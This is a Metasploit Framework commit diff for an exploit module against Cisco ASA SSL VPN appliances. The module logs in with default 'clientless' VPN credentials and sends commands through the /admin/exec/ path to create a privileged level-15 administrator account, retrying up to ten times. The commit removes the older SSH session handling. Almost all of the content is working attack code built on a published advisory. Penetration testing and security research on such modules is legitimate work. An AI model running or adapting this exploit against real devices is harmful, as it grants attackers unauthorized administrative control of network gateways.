Remove MetaSSH requirements

Jonathan Claudius · Jonathan Claudius · commit 186d20b0ed4d · 2014-06-12T21:59:40.000-04:00
diff --git a/modules/exploits/multi/http/cisco_ssl_vpn_priv_esc.rb b/modules/exploits/multi/http/cisco_ssl_vpn_priv_esc.rb
@@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
 
   attr_accessor :ssh_socket
 
@@ -32,22 +33,27 @@ def initialize(info = {})
           [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-asa' ],
           [ 'URL', 'https://www3.trustwave.com/spiderlabs/advisories/TWSL2014-005.txt' ]
         ],
-      'Privileged'     => false,
+      'Targets'        => [[ 'Automatic', {}]],
+      'DefaultOptions'  =>
+        {
+          'ExitFunction' => "none"
+        },
       'Payload'        =>
         {
-          'DisableNops' => true,
-          'Space'       => 1024,
-          'Compat'      =>
-            {
-              'PayloadType' => 'ssh',
-              'ConnectionType' => 'ssh',
-            }
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
         },
-      'Platform'       => ['ssh'],
-      'Arch'           => ARCH_SSH,
-      'Targets'        => [[ 'Automatic', { }]],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => 'Sep 18 2013'
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['Cisco ASA', {} ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "April 9, 2014",
+
     ))
 
     register_options(
@@ -57,7 +63,9 @@ def initialize(info = {})
         OptString.new('USERNAME', [true, "A specific username to authenticate as", 'clientless']),
         OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'clientless']),
         OptString.new('GROUP', [true, "A specific VPN group to use", 'clientless'])
-      ], self.class)
+      ], self.class
+    )
+
   end
 
   # Verify whether the connection is working or not
@@ -118,11 +126,11 @@ def do_logout(cookie)
   def run_command(cmd, cookie)
     reformatted_cmd = cmd.split(" ").join("+")
 
-    res = send_request_cgi({
-      'uri'       => "/admin/exec/#{reformatted_cmd}",
-      'method'    => 'GET',
-      'cookie'    => cookie
-    })
+    res = send_request_cgi(
+            'uri'       => "/admin/exec/#{reformatted_cmd}",
+            'method'    => 'GET',
+            'cookie'    => cookie
+          )
 
     if res
       return res
@@ -181,7 +189,8 @@ def add_user(cookie, tries = 10)
       resp = run_command(command, cookie)
 
       if resp &&
-         !resp.body.include?('Command authorization failed')
+         !resp.body.include?('Command authorization failed') &&
+         !resp.body.include?('Command failed')
         print_good("#{peer} - Privilege Escalation Appeared Successful")
         return [username, password]
       else
@@ -205,33 +214,6 @@ def random_username(length = 8)
     (0...length).map { char_array[rand(char_array.length)] }.join
   end
 
-  def ssh_login(ip, user, pass)
-    opt_hash = {
-      :auth_methods  => ['password', 'keyboard-interactive'],
-      :msframework   => framework,
-      :msfmodule     => self,
-      :port          => 22,
-      :disable_agent => true,
-      :config        => false,
-      :password      => pass
-    }
-
-    begin
-      session = Net::SSH.start(ip, user, opt_hash)
-      return session
-    rescue Rex::ConnectionError, Rex::AddressInUse
-      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
-    rescue Net::SSH::Disconnect, ::EOFError
-      fail_with(Failure::Disconnected, 'Timed out during negotiation')
-    rescue Net::SSH::AuthenticationFailed
-      fail_with(Failure::NoAccess, 'Failed authentication')
-    rescue Net::SSH::Exception => e
-      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
-    end
-
-    return nil
-  end
-
   def do_login(user, pass, group)
     begin
       cookie = "webvpn=; " + 
@@ -283,11 +265,11 @@ def exploit
     # Validate we're dealing with Cisco SSL VPN
     validate_cisco_ssl_vpn()
 
-    ssh = nil
-    creds = nil
-
-    5.times do |i|
-      vprint_status("#{peer} - *** Exploit Session Attempt #{(i + 1).to_s} ***")
+    # This is crude, but I've found this to be somewhat 
+    # interimittent based on session, so we'll just try 
+    # 10 times.
+    10.times do |i|
+      print_good("#{peer} - Exploit Attempt ##{i}")
 
       # Authenticate to SSL VPN and get session cookie
       cookie = do_login(
@@ -296,27 +278,29 @@ def exploit
                  datastore['GROUP']
                )
 
-
+      # Grab version
       version = do_show_version(cookie, 1)
-      unless version
+
+      if version_match = version.match(/Cisco Adaptive Security Appliance Software Version ([\d+\.\(\)]+)/)
+        print_good("#{peer} - Show version succeeded. Version is Cisco ASA #{version_match[1]}")
+      else
         do_logout(cookie)
+        print_good("#{peer} - Show version failed")
         next
       end
 
+      # Attempt to add an admin user
       creds = add_user(cookie, 1)
 
-      # Logout of our SSL VPN session
       do_logout(cookie)
 
-      break if creds
-    end
-
-    username, password = creds
-
-    if ssh = ssh_login(datastore['RHOST'], username, password)
-      handler(ssh)
+      if creds
+        print_good("#{peer} - Successfully added level 15 account #{creds.join(", ")}")
+        break
+      else
+        print_good("#{peer} - Failed to created user account")
+      end
     end
-
   end
 
 end
